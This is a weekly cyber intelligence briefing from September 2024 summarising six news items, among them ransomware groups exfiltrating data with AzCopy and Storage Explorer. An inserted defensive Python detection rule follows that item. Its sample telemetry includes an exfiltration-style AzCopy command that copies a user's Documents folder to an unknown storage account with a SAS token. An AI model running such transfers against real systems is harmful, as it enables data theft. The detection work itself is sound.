20 September 2024

US warns of widespread disinformation campaigns | Cyber Intelligence Briefing: 20 September

Top news stories this week

  1. Fake news. US warns of widespread disinformation campaigns.
  2. Settle up. 23andMe, Lehigh Valley Health Network (LVHN), and AT&T reach settlements over their past data breaches.
  3. BEC barrage. US government agencies and a Tennessee school district fall victim to separate email scams.
  4. Botnet busted. FBI takes down China-linked botnet.
  5. Under the radar. Ransomware groups exploit Microsoft Azure tooling to exfiltrate data.
  6. Out of commission. City of Columbus’ systems still partly down two months after cyber attack.


1. The US warns of widespread disinformation campaigns

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have alerted the public to global disinformation campaigns. They warn that Kremlin-backed media outlets operating in democracies around the world are providing cover for Russian cyber spies and are actively working to sow discord. In response, Meta has banned Russian state-owned media accounts from its social media platforms.

So what?

The spread of disinformation could become another vector for threat actors to gain access to organisational networks, whether through phishing or scam campaigns. Organisations and individuals should stay vigilant when receiving information from unverified sources.

[Researcher: Milda Petraityte]


2. 23andMe, LVHN, and AT&T reach settlements over their past data breaches

Several companies have agreed to substantial settlements following data breaches in 2023. 23andMe will pay USD 30 million, Lehigh Valley Health Network will pay USD 65 million, and AT&T has settled for USD 13 million with the Federal Communications Commission. These settlements aim to compensate affected data subjects.

So what?

Data breaches can result in significant costs from lawsuits and fines if data protection measures are inadequate and if the incident is not handled effectively.

[Researcher: Aditya Ganjam Mahesh]


3. US government agencies and a Tennessee school district fall victim to separate BEC scams

The US Department of Justice indicted a Chinese national for spear phishing US government agencies including NASA, the US Air Force, and the Federal Aviation Administration to steal aerospace technology and commit wire fraud.

Separately, an employee in a northeast Tennessee school district sent USD 3.4 million to a fake curriculum vendor, believing the funds were for legitimate online curriculum materials. The investigation revealed that several individuals had unknowingly fallen victim to this Business Email Compromise (BEC) fraud campaign.

So what?

Government agencies and organisations alike should implement regular training and awareness programmes for their staff as phishing techniques become more complex. Watch S-RM’s latest webinar on the rising threat of BECs and their impact on the broader threat landscape.

[Researcher: Lawrence Copson]


4. FBI busts China-linked botnet with over 200,000 devices infected

A court-sanctioned law enforcement operation has dismantled a botnet that infected over 200,000 devices worldwide. Court documents reveal that Integrity Technology Group, a publicly traded company in Beijing, developed and controlled the botnet, which the FBI links to the China-based hacking group “Flax Typhoon”.

So what?

Regularly updating and patching systems and software, including internet-facing devices such as routers and IoT equipment, is crucial to remove exploitable vectors of compromise.

[Researcher: Lena Krummeich]


5. Hackers exploit Microsoft Azure tooling to exfiltrate data during ransomware attacks

Rhysida, BianLian and other ransomware groups are using Microsoft’s Azure Storage Explorer and the AzCopy data transfer tool to steal files from compromised systems. After installing these tools on a compromised host, the attackers transfer the victim’s data to cloud storage they control.

So what?

Threat actors are increasingly weaponising legitimate, vendor-signed tooling to evade detection, because outbound traffic to Microsoft cloud services blends in with normal business activity and is rarely blocked. Organisations should closely monitor for suspicious use of these tools, for example AzCopy or Storage Explorer appearing on hosts where they have no business purpose, or transfers to storage accounts the organisation does not own.

[Researcher: Adelaide Parker]
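The following is an added detection example, not code from S-RM or from the briefing. It runs a simple rule over constructed process-creation events (the key=value line format, host names, user names, storage account names and the allow-lists are all assumptions made up for this illustration) and flags AzCopy or Storage Explorer activity that a defender would want to review: the tool running on a host that is not approved for bulk transfers, the binary launched from a download or temp folder, a destination storage account that the organisation does not own, or a shared access signature passed on the command line.

```python
"""Flag suspicious Azure Storage Explorer / AzCopy use in process-creation telemetry.

Added example, not part of the S-RM briefing. The event lines below are
constructed; the key=value layout is an assumption, not any vendor's real format.
"""
import re
from dataclasses import dataclass

# Constructed sample telemetry: one process-creation event per line.
SAMPLE_EVENTS = r"""
ts=2024-09-18T02:14:07Z host=FILESRV01 user=CORP\svc_backup image="C:\Tools\azcopy.exe" cmdline="azcopy.exe copy D:\Backups https://corpbackups.blob.core.windows.net/nightly --recursive"
ts=2024-09-18T02:31:55Z host=WS-FIN-07 user=CORP\j.doe image="C:\Users\j.doe\Downloads\azcopy.exe" cmdline="azcopy.exe copy C:\Users\j.doe\Documents https://h8kz3.blob.core.windows.net/x?sv=2022-11-02&sig=REDACTED --recursive"
ts=2024-09-18T02:33:10Z host=WS-FIN-07 user=CORP\j.doe image="C:\Users\j.doe\AppData\Local\Programs\Microsoft Azure Storage Explorer\StorageExplorer.exe" cmdline="StorageExplorer.exe"
ts=2024-09-18T03:02:41Z host=WS-HR-12 user=CORP\a.smith image="C:\Windows\System32\notepad.exe" cmdline="notepad.exe notes.txt"
"""

# Assumed organisational context: where bulk transfers are sanctioned and which
# storage accounts belong to the organisation. Real deployments feed these from a CMDB.
APPROVED_TRANSFER_HOSTS = {"FILESRV01"}
KNOWN_STORAGE_ACCOUNTS = {"corpbackups"}
TRANSFER_TOOLS = {"azcopy.exe", "storageexplorer.exe"}

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
ACCOUNT_RE = re.compile(r"https://([a-z0-9]+)\.blob\.core\.windows\.net", re.I)
USER_WRITABLE_RE = re.compile(r"\\(Downloads|Temp)\\", re.I)


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    tool: str
    reasons: list


def parse_event(line: str) -> dict:
    """Parse one key=value event line; quoted values may contain spaces."""
    return {key: quoted or bare for key, quoted, bare in KV_RE.findall(line)}


def analyse(event: dict):
    """Return a Finding when a transfer tool is used in a suspicious way, else None."""
    image = event.get("image", "")
    tool = image.rsplit("\\", 1)[-1].lower()
    if tool not in TRANSFER_TOOLS:
        return None

    reasons = []
    host = event.get("host", "")
    if host not in APPROVED_TRANSFER_HOSTS:
        reasons.append(f"transfer tool executed on non-approved host {host}")
    if USER_WRITABLE_RE.search(image):
        reasons.append("binary launched from a download or temp folder")

    cmdline = event.get("cmdline", "")
    for account in ACCOUNT_RE.findall(cmdline):
        if account.lower() not in KNOWN_STORAGE_ACCOUNTS:
            reasons.append(f"destination storage account '{account}' is not organisation-owned")
    if "sig=" in cmdline.lower():
        reasons.append("SAS token on the command line (credential not tied to a corporate identity)")

    if not reasons:
        return None
    return Finding(event.get("ts", ""), host, event.get("user", ""), tool, reasons)


def detect(log_text: str) -> list:
    """Run the rule over a block of event lines and collect the findings."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        finding = analyse(parse_event(line))
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.ts} {f.host} {f.user} {f.tool}")
        for reason in f.reasons:
            print(f"  - {reason}")
```

The sanctioned nightly backup on FILESRV01 produces no finding, while the same tool run from a finance workstation's Downloads folder against an unknown storage account with a SAS token collects four separate reasons; scoring on the number of reasons is one way to prioritise alerts when the tools are in legitimate use elsewhere in the estate.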


6. City of Columbus’ systems still partly down two months after cyber attack

The City of Columbus in Ohio has confirmed that 21 percent of its systems are still down and 8 percent are only partially functional after a Rhysida ransomware attack in July 2024. Following the attack, the city’s mayor approved USD 4 million to help recover from the incident.

So what?

A regularly tested disaster recovery plan can help ensure there is minimal downtime following a cyber incident.

[Researcher: David Broome]


The S-RM Cyber Intelligence Briefing is a weekly round-up of the latest cyber security news, trends, and indicators, curated by our intelligence specialists.
